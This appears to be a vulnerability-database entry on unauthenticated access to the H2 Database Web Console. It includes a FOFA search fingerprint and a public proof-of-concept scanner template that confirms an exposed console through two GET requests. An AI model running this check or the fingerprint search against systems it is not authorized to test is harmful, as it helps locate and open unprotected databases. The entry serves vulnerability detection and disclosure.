h2-database-web-console-unauthorized-access: H2 Database Web Console Unauthorized Access

Date: 2025-08-01 | Affected software: H2 Database Web Console | PoC: Public

Vulnerability description

fofa: H2-Console

PoC code [public]

id: h2-database-web-console-unauthorized-access

info:
  name: H2 Database Web Console Unauthorized Access
  author: jujumanman
  severity: high
  verified: true
  description: |-
    fofa: H2-Console
  tags: h2,console,unauth
  created: 2023/07/07

rules:
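  # r0: fetch the console entry page, confirm the "Welcome to H2" landing page,
  # and capture the session path from its JavaScript redirect (location.href).
  r0: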
    request:
      method: GET
      path: /h2-console
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b"Welcome to H2")
    output:
      search: '"location.href = ''(?P<token>.+?)''".bsubmatch(response.body)'
      token: search["token"]
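  # r1: request the captured path and confirm the response body contains
  # "Generic H2", i.e. the console page is served without prior authentication.
  r1: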
    request:
      method: GET
      path: /h2-console/{{token}}
    expression: response.status == 200 && response.body.bcontains(b"Generic H2")
# Report a finding only when both rules match.
expression: r0() && r1()